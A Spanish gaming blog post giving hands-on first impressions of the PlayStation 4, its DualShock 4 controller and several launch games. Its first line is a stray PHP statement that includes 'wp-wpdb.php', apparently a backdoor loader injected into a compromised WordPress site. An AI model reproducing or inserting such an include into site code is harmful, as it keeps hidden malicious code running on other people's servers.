if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Probamos PlayStation 4. Primeras impresiones – La Fortaleza de LeChuck

Probamos PlayStation 4. Primeras impresiones

Ayer estuvimos en la presentación de PS4 que Sony hizo en Barcelona, y como no, dejamos nuestro barco fantasma en el muelle Barcelonés para no perdernos tan grato evento. Había consola que ver, mando que manosear, y juegos que degustar, cual tapa de terraza en las ramblas. Repasemos nuestras impresiones de la consola, del mando y de los juegos que pudimos probar, que fueron varios pero no todos los de lanzamiento.
Curiosamente, uno de los más esperados por cualquier fan de Playstation, como es Killzone Shadow Fall, no estuvo presente más que en algún video en televisiones secundarias y alguna carátula suelta para poner los dientes largos. Pero vamos a pasar a hablar de lo que sí vimos y jugamos, que no fue poca cosa.

PlayStation 4

PlayStation 4 se dejaba ver tal cual estará en nuestras casas en sus expositores. Aunque resulta ser más pequeña que la PS3 original en su día (Que era muy FAT) realmente sigue notándose que en 2 años saldrá una PS4 Slim. Aún así, luce moderna con esos «cortes» diagonales en los laterales, su diseño anguloso, y esa luz LED que separa en dos la consola.

DualShock 4

Lo que más ganas tenía de probar. Los juegos estarán, la consola, también, pero lo que va a conducir nuestro vicio va a ser el mando y ¡Que sorpresa nos hemos llevado!. El nuevo Dual Shock 4 es el mando más cómodo en mano que he probado hasta ahora. La ergonomía de sus dos «cuernos» es simplemente perfecta (Lo dice un adorador del mando de Xbox 360) y por fin deja de un lado el hecho de tenerlos demasiado desviados hacia atrás. El agarre también es mejor que anteriores mandos, ese tacto antideslizante sin llegar a repeler al tocarlo, es simplemente perfecto. La posición de los sticks sigue siendo la clásica, con el pad digital en la posición de los botones, simétricamente, y los dos sticks analógicos en el centro. No es mi favorita pero no están mal. Si me han parecido más pequeños en tamaño aunque resueltos con un centro cóncavo que hace que el dedo no resbale, que es lo importante. La botonera sigue siendo la clásica, con unos gatillos mejor tratados que en anteriores Dual shock, usando la misma posición. La parte más innovadora es el trackpad central, que no solo será eso, un trackpad al uso, si no también un botón físico. Es interesante ver como el trackpad hacer curva por arriba, con lo que también podemos pulsar ese botón como si fuera un tercer gatillo superior alargando un poco los dedos. También a destacar, la situación del botón Start y Share (Que sustituye al eterno botón Select) que se desplazan a cada lado del trackpad haciendo que estén mucho más a mano que en el anterior modelo de PS3.
Buenas ideas en un mando que evoluciona por fin de verdad, y deja atrás las ideas abstractas como el «banana mando» que Sony presentó inicialmente con PS3 y el diseño original del incómodo (hasta que te acostumbras) y anticuado Dual Shock .

Drive Club

Quizás uno de los más esperados con el lanzamiento de la consola, con un concepto social muy marcado por ese mismo carácter impulsado con PS4 y su particular botón «Share».

Técnicamente impecable, aún con algún problema de framerate (cosas de demos que quedarán subsanadas en su versión final), destacando el nivel de detalle puesto en los coches, con especial mención a los salpicaderos, que en la vista desde el interior del coche hace totalmente realista la experiencia.

Probamos unas carreras por equipos, en dos televisores jugaba uno, y en otras dos otro equipo, y se contabilizaba individualmente quien hacía mejor tiempo jugando contra los fantasmas de los contrincantes. Un buen juego de coches del que en esta demo no pudimos ver todas las posibilidades, que es la propuesta principal de jugar con amigos Online. No logró sorprenderme excesivamente, pero está claro que es perfecto para el público de Sony.

Knack

También pudimos jugar a esta aventura plataformera, bastante interesante en su propuesta. Obtiene sus ingredientes de cualquier «Lego-algo» y le sumamos el hecho «katamariesco» de ir haciéndose más grande como si fuéramos un imán para la piedra y madera. Ingenioso y una propuesta alternativa a los demás juegos de lanzamiento. Sin pretensiones, pero con buenas ideas. Al fin y al cabo lo firma el creador de Crash Bandicoot y Jak and Daxter.

Watchdogs

Con Watchdogs no tuvimos la suerte de probarlo directamente, aunque si nos enseñaron un gameplay una exclusiva demo que dentro de Europa solo habían visto en Madrid y Valencia. Un chico de Ubisoft la jugó mientras explicaba las características del juego.

El juego lucía como cuando se hace un port a PC de un juego de anterior generación, nada sorprendente técnicamente. Nos enseñaron las posibilidades desde nuestro smartphone con la ciudad, desde poder ver la edad, sueldo y trabajo de cada ser «viviente» en la ciudad, hasta poder utilizar la electrónica a nuestro favor, como por ejemplo para hacer un apagón de luz o poner todos los semáforos en verde en una persecución para provocar el caos y despistar, o, en esta misma situación, activar un puente levadizo para no dejar pasar a nuestros perseguidores.

Todo muy chulo visto en escena, pero veremos si es realmente útil en juego o es simplemente espectáculo para hacer demos. En cuanto a la acción, podremos sobrepasarla de forma sigilosa sin tener que matar a nadie en todo el juego, o encararnos y ver la realidad, que así no vas a ninguna parte.

El control es muy muy Assassin’s Creed combinado con Splinter Cell. A la hora de usar las coberturas se acerca más a SC: Blacklist, con ese control semiautomático cuando queremos pasar de una cobertura a otra. A la hora de movernos por la ciudad, bebe más de Assassin’s Creed, como muchos suponíamos.

A falta de ver más y jugar, veremos si realmente todas las posibilidades expuestas lo convierten en un juego a considerar, o en uno de esos Ubijuegos que todo pinta bien hasta que juegas y no te diviertes.

Assassin’s Creed 4

Con AC4, también hubo una demo explicada para ver las bondades de la mayor novedad en Assassin’s Creed, el mar. Nuestro barco jugará un papel muy importante y las misiones marítimas se llevarán el mayor porcentaje de nuestro tiempo, así que esta vez no se puede decir que no estén intentando innovar.

La misión del gameplay consistía en atacar un fuerte en una isla desde nuestro barco, para derrotarla y conquistarla, aunque, por supuesto,nuestros enemigos también tenían su barco y sus cañones de tierra para intentar evitarlo.

Timón en mano, el control parecía un poco confuso, de esos que te tienes que hacer a el y que al principio te hará perder los estribos, pero la simulación de pirata parece bien llevada. En cualquier momento podremos soltar el timón y movernos por nuestro barco, saltar al otro para atracarlo, o saltar al agua para nadar a la orilla de cualquier isla. Esperamos que en «alta» mar haya también algún detallito como más barcos o pequeños islotes. Por supuesto, cuando vayamos a pie, AC no pierde su identidad, haremos saltos imposibles y batallaremos con un montón de combos, Ubisoft catalogó el juego como el «Assassin’s Creed más abierto».

La verdad es que todo lucía muy bien, y técnicamente impresionante (Aunque siga siendo un «port»), un mar muy bien parido, y claro está, a nosotros el rollo pirata nos atrae bastante, así que le daremos voto de confianza.

Hohokum

Un juego «indie» solo para PSN se colaba entre los escogidos para enseñar las bondades de PS4, lo que dice mucho de Sony en su apuesta por llevar buenos juegos de esta categoría a su consola. Hohokum es un original y relajante juego en el que moveremos una culebra voladora por un mundo minimalista en 2D donde tendremos que explorar la zona y ayudar a sus habitantes. Para comprenderlo hay que probarlo, y aún así muchos de los que lo probaron preguntaban ¿Y cúal es el objetivo del juego?, pues la demo carecía de señales ni tutoriales.

The Playroom

La típica demo para usar las capacidades del mando, tanto el trackapd, como los movimientos al estilo «Move» implementados, además de la asociación con la Cámara que podrá comprarse a parte en PS4. Aunque son dos o tres minijuegos, el principal trata de interactuar con unos robots que saldrán del Dual Shock al mundo real, los cuales veremos reflejados al lado tuyo en la tele gracias a la cámara. Podremos sacar un montón, para luego patearlos, asustarlos, etc o devolverlos al interior del mando aspirándolos, para dentro, hacer coreografías musicales pulsando botones. Un minijuego divertido para enseñar las posibilidades del mando y la cámara, pero es muy poco probable que le des más de dos minutos.

Conclusión

Aunque los lanzamientos de consolas suelen ser bastante vacíos en cuanto a catálogo (Siempre buscamos juegos que nos enseñen las capacidades de nuestra nueva consola, pero suelen tardar en llegar), parece que PlayStation 4 estará bastante bien nutrida, y solo lo empaña un poco el hecho de que algunos sean ports pensados para consolas actuales. Está claro que el público de Sony tendrá suficiente, de primeras, con Drive Club y Killzone Shadow Fall, pero alguno de estos juegos como, por ejemplo, Knack también nos parecen interesantes como para darles la oportunidad.

Playstation 4 está destinada a arrasar según todas las quinielas, y no solo por sus capacidades, sino por su excelente precio (respecto a Xbox One, competencia directa) y gran aceptación y comprensión por el público. Resérvala al mejor precio en OfertasJuegos.com.

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

Dejar un comentario